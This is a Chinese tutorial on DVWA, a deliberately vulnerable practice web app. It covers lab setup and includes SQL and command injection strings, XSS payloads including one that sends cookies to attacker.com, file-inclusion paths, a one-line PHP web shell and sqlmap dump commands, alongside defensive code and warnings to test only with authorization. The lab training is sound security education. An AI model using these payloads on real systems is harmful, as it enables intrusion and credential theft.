news 2026/5/1 6:50:14

DVWA漏洞靶场实战项目

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
DVWA漏洞靶场实战项目

DVWA漏洞靶场实战项目

一、项目概述

DVWA(Damn Vulnerable Web Application)是一个专门用于安全漏洞学习和测试的PHP/MySQL Web应用。本项目将带你完成DVWA靶场的搭建、配置和漏洞实战演练。

二、环境搭建

1. 准备工作

方案一:使用Docker(推荐)

# 拉取DVWA镜像docker pull vulnerables/web-dvwa# 运行容器docker run -d -p80:80 --name dvwa vulnerables/web-dvwa

方案二:本地安装(XAMPP/WAMP)

  1. 下载XAMPP:https://www.apachefriends.org/
  2. 下载DVWA:https://github.com/digininja/DVWA
  3. 将DVWA解压到htdocs目录
  4. 启动Apache和MySQL服务

2. 初始化配置

# 访问DVWAhttp://localhost# 点击"Create/Reset Database"创建数据库# 默认登录凭据:# 用户名:admin# 密码:password

三、安全等级设置

  • Low:无防护,用于学习漏洞原理
  • Medium:基础防护,需绕过简单过滤
  • High:较强防护,需高级绕过技巧
  • Impossible:最佳实践防护

四、核心漏洞实战

1. SQL注入(SQL Injection)

Low等级攻击:

-- 基础注入1' OR '1'='1-- 获取数据库信息1' UNION SELECT user(), database()-- -- 获取表名 1'UNIONSELECTtable_name,2FROMinformation_schema.tablesWHEREtable_schema=database()--

防御措施:

  • 使用参数化查询
  • 对输入进行严格过滤
  • 最小权限原则

2. 命令注入(Command Injection)

攻击示例:

127.0.0.1 && whoami 127.0.0.1 | cat /etc/passwd 127.0.0.1; ls -la

防御措施:

  • 使用白名单验证输入
  • 避免使用系统调用函数
  • 使用安全的API替代

3. 跨站脚本(XSS)

反射型XSS:

<script>alert(document.cookie)</script><svgonload=alert(1)>

存储型XSS:

<script>newImage().src="http://attacker.com/steal?cookie="+document.cookie</script>

防御措施:

  • 输出编码
  • 设置HttpOnly Cookie
  • 使用CSP策略

4. 文件包含(File Inclusion)

本地文件包含:

../../../../etc/passwd php://filter/convert.base64-encode/resource=index.php

远程文件包含:

http://attacker.com/shell.txt

5. 文件上传漏洞

攻击步骤:

  1. 创建恶意PHP文件
<?phpsystem($_GET['cmd']);?>
  1. 修改文件扩展名绕过检测
  2. 访问上传的文件执行命令

五、自动化测试工具实践

1. 使用Burp Suite

配置流程: 1. 设置浏览器代理 2. 拦截HTTP请求 3. 使用Intruder模块进行暴力破解 4. 使用Repeater模块修改请求 5. 使用Scanner自动扫描漏洞

2. 使用SQLMap

# 基础扫描sqlmap -u"http://localhost/vulnerabilities/sqli/?id=1&Submit=Submit"--cookie="PHPSESSID=xxx; security=low"# 获取数据库sqlmap -u<URL>--cookie=<COOKIE>--dbs# 获取表名sqlmap -u<URL>--cookie=<COOKIE>-D dvwa --tables# 获取数据sqlmap -u<URL>--cookie=<COOKIE>-D dvwa -Tusers--dump

六、实战演练任务清单

漏洞类型难度任务要求完成状态
SQL注入Low获取所有用户信息
SQL注入Medium绕过过滤获取数据
XSS反射型Low弹出当前Cookie
XSS存储型Medium窃取管理员Cookie
文件上传High上传WebShell并执行命令
CSRFMedium构造恶意页面修改密码

七、防御代码示例

1. 安全的SQL查询(PHP)

// 使用预处理语句$stmt=$pdo->prepare("SELECT * FROM users WHERE id = :id");$stmt->execute(['id'=>$userId]);$result=$stmt->fetchAll();

2. XSS防护

// 输出编码echohtmlspecialchars($user_input,ENT_QUOTES,'UTF-8');// 设置CSP头header("Content-Security-Policy: default-src 'self'");

3. 安全的文件上传

// 检查文件类型$allowed_types=['image/jpeg','image/png'];if(!in_array($_FILES['file']['type'],$allowed_types)){die("Invalid file type");}// 重命名文件$new_filename=uniqid().'.'.$extension;

八、学习路线建议

第一阶段:基础入门(1-2周)

  1. 完成环境搭建和基本配置
  2. 逐个尝试Low等级的所有漏洞
  3. 理解每种漏洞的原理

第二阶段:进阶挑战(2-3周)

  1. 尝试Medium和High等级
  2. 学习绕过技巧
  3. 使用自动化工具辅助测试

第三阶段:深入分析(1周)

  1. 查看Impossible级别的源代码
  2. 理解最佳防御实践
  3. 尝试编写自己的防护代码

九、注意事项

  1. 合法授权:仅在授权的测试环境中使用
  2. 备份数据:测试前备份重要数据
  3. 网络隔离:在隔离的网络环境中测试
  4. 学习目的:仅用于学习网络安全知识

十、扩展资源

  1. 官方文档:https://github.com/digininja/DVWA
  2. CTF挑战:尝试其他漏洞靶场如WebGoat、bWAPP
  3. 在线平台:HackTheBox、TryHackMe
  4. 相关书籍:《Web安全深度剖析》《白帽子讲Web安全》

项目总结:通过DVWA实战项目,你可以系统性地学习Web安全漏洞的原理、利用方式和防御方法。建议按照从易到难的顺序逐步深入,并结合实际代码分析加深理解。安全测试不仅是技术学习,更需要良好的职业道德和法律意识。

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/5/1 5:50:33

性能优化之分块渲染

在遇到大量数据需要渲染的时候&#xff0c;一次性渲染会阻塞主线程导致页面卡顿&#xff0c;可以用分块渲染提升页面性能&#xff0c;将大量DOM结点的渲染拆分为多个小任务&#xff0c;避免主线程长时间阻塞&#xff0c;减少页面卡顿。<script setup lang"ts">…

作者头像 李华
网站建设 2026/4/29 3:57:53

c++单调数据结构————单调栈,单调队列

目录 一&#xff0c;单调栈 二&#xff0c;单调队列 例题一(单调栈&#xff09;&#xff1a;蓝桥杯官网——百亿富翁 题目描述 输入描述 输出描述 输入输出样例 示例 1 代码详解&#xff1a; 解释&#xff1a;计算 dpl 时 stk 的工作过程 例题二&#xff08;单调队列…

作者头像 李华
网站建设 2026/4/18 8:13:23

【AI OCR加速新突破】:Dify + Tesseract 实现每秒百页文档识别的秘密

第一章&#xff1a;Dify Tesseract 的识别速度在处理大规模文档自动化任务时&#xff0c;OCR 引擎的识别速度直接影响系统整体效率。Dify 集成的 Tesseract OCR 引擎经过定制优化&#xff0c;在保持高准确率的同时显著提升了图像文本识别的响应性能。影响识别速度的关键因素 图…

作者头像 李华
网站建设 2026/4/24 17:33:04

2025年高口碑AI数字人公司推荐,探寻值得信赖的选择

在2025年&#xff0c;数字人交互技术蓬勃发展&#xff0c;市场上出现了众多优秀的AI数字人交互公司。本文将为您盘点高口碑的AI数字人交互公司TOP10&#xff0c;帮助您在选择时少走弯路。这些公司以其创新技术和优质服务赢得了用户信赖&#xff0c;是您理想的合作伙伴。让我们一…

作者头像 李华
网站建设 2026/5/1 6:49:43

ES理论:分页查询方案及优化策略

文章目录前言常见的 Elasticsearch 分页设计方案1. from size 分页 (浅分页)2. scroll 分页 (游标分页/深分页)3. search_after 分页 (搜索后分页)4. 基于 PIT (Point In Time) 的 search_after 分页方案总结与对比核心建议资料获取前言 博主介绍&#xff1a;✌目前全网粉丝4…

作者头像 李华
网站建设 2026/5/1 0:12:09

从零搭建智能测试流水线:Dify中Agent工具的7步用例验证法

第一章&#xff1a;从零理解Dify中Agent工具的核心机制Dify中的Agent工具是一种基于大语言模型&#xff08;LLM&#xff09;能力构建的智能代理系统&#xff0c;能够在动态环境中感知输入、决策逻辑并执行任务。其核心机制依赖于“意图识别—工具选择—执行反馈”三阶段流程&am…

作者头像 李华